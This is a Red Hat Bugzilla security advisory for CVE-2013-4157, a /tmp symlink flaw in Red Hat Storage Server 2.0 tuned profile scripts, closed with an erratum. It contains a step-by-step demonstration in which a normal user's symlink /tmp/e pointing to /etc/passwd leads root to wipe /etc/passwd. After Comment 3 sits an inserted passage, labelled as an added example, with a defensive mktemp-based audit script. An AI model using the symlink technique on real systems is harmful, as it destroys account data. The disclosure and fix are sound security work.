Bug 986516 (CVE-2013-4157)

Summary: CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-server /tmp file creation vuln
Product: [Other] Security Response
Reporter: Kurt Seifried <kseifried>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: low
Priority: low
Version: unspecified
CC: aavati, barumuga, grajaiya, jrusnack, rfortier, security-response-team, shaines, ssaha, vagarwal, vbellur
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Doc Type: Bug Fix
Story Points: ---
Last Closed: 2013-09-04 18:48:25 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Category: ---
oVirt Team: ---
Cloudforms Team: ---
Bug Depends On: 986517, 986518
Bug Blocks: 986520

Description Kurt Seifried 2013-07-20 04:52:15 UTC
Gowrishankar Rajaiyan (grajaiya) reports:

I found a potential security issue with redhat-storage-server-1.7.3-2.el6rhs.noarch, previously known as appliance-base-1.7.3-1.el6rhs, while verifying https://bugzilla.redhat.com/show_bug.cgi?id=910566. This issue also exists in the latest released version of RHS: https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689

Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh 
and /etc/tune-profiles/rhs-virtualization/ktune.sh
<snip>
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
</snip>


A file "e" is created in the /tmp directory. This information is public at https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 (I set it to private now, not sure if that helps). So any normal user can create a softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as the root user, which exposes a security loophole wherein a normal user can wipe out /etc/passwd.

Please guide on how to proceed from here.


A demonstration is as follows:
As normal user:
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/

[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log
-rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root root 0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on 
brick devices:
[ OK ]
Reverting to cfq elevator: dm-0 dm-1 [ OK ]
Stopping tuned: [ OK ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on 
brick devices:
[ OK ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1 [ OK ]
Starting tuned: 'import site' failed; use -v for traceback
[ OK ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#

Comment 3 Kurt Seifried 2013-07-20 05:30:57 UTC
Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:          done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:          echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:          done) 2>> /tmp/bricks.err
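
The pattern Comment 3 lists (a root-run script writing to fixed names under /tmp) next to the safe alternative, as an added example that is not from this bug report or from the RHSA-2013:1205 fix; the function names, the scratch-directory layout and the limit values passed in are assumptions.

```shell
#!/bin/sh
# Added example (not the RHSA-2013:1205 fix): an audit helper that flags
# hard-coded /tmp paths in a tuned profile script, plus the safe pattern
# (private mktemp directory, atomic rename) that replaces them.

# Print the lines of script $1 that use a fixed path under /tmp, skipping
# paths handed to mktemp. Exits 0 if any were found, non-zero otherwise.
find_fixed_tmp_paths() {
    grep -nE '(^|[^[:alnum:]_])/tmp/[[:alnum:]_.-]+' "$1" | grep -v mktemp
}

# Create a 0700 scratch directory with an unpredictable name; print its path.
# Files created inside it cannot be pre-planted as symlinks by other users.
make_scratch_dir() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/ktune.XXXXXX") || return 1
    chmod 700 "$d" && printf '%s\n' "$d"
}

# Same brick-directory search as the original loop, but find's stderr goes to
# a file inside the private scratch dir $2 rather than to /tmp/e.
# $1 = glusterd vols directory. Prints the brick directories found.
list_brick_dirs() {
    find "$1" -name bricks -type d 2>"$2/find.err"
}

# Replace the nofile lines in limits file $1 with soft/hard limits $3/$4.
# The new content is staged in scratch dir $2 (never /tmp/limits.conf) and
# then renamed over the target, so no world-writable path is ever involved.
rewrite_limits_conf() {
    conf=$1 scratch=$2 soft=$3 hard=$4
    [ -f "$conf" ] || return 1
    staged="$scratch/limits.conf.$$"
    {
        grep -v 'soft nofile' "$conf" | grep -v 'hard nofile' || :  # no match is fine
        echo "* soft nofile $soft"
        echo "* hard nofile $hard"
    } > "$staged" || return 1
    chmod 644 "$staged" && mv -f "$staged" "$conf"
}
```

Run `find_fixed_tmp_paths` over each file in /etc/tune-profiles to locate the remaining fixed-path writes; the three other functions show the replacement for each one.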

Comment 4 Murray McAllister 2013-09-04 11:34:45 UTC
Acknowledgements:

These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.

Comment 5 errata-xmlrpc 2013-09-04 18:10:55 UTC
This issue has been addressed in the following products:

  Red Hat Storage 2.0

Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html